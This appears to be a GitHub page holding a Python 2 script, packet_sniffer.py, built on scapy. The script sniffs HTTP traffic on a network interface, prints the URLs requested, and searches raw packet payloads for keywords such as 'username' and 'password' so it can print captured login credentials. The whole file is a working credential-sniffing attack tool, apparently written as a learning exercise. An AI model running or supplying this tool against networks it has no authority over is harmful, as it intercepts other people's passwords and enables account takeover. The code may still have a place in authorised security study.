-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathpacket_sniffer.py
53 lines (37 loc) · 1.58 KB
/
packet_sniffer.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
#!/usr/bin/python
"""A simple script used to sniff packets coming across the network and extract data.
Script uses Python 2.7.16"""
from scapy.layers import http
import scapy.all as scapy
import argparse
def get_arguments():
"""Get user supplied arguments from terminal."""
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--interface', dest='interface', help='Interface to sniff for packets.')
(options) = parser.parse_args()
return options
def sniff(interface):
"""Intercepts packets coming through the specified interface"""
scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
def get_url(packet):
"""Returns a formatted URL"""
return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path
def get_login_info(packet):
"""Returns login info"""
if packet.haslayer(scapy.Raw):
load = str(packet[scapy.Raw].load)
keywords = ['username', 'user', 'login', 'password', 'pass']
for keyword in keywords:
if keyword in load:
return load
def process_sniffed_packet(packet):
"""Process the packets and prints output to terminal"""
if packet.haslayer(http.HTTPRequest):
url = get_url(packet)
print('[+] HTTP Request >> ' + url.decode())
login_info = get_login_info(packet)
if login_info:
print('\n\n[+] Possible username/password >> ' + login_info + '\n\n')
options = get_arguments() # captures argument from terminal
interface = options.interface
sniff(interface)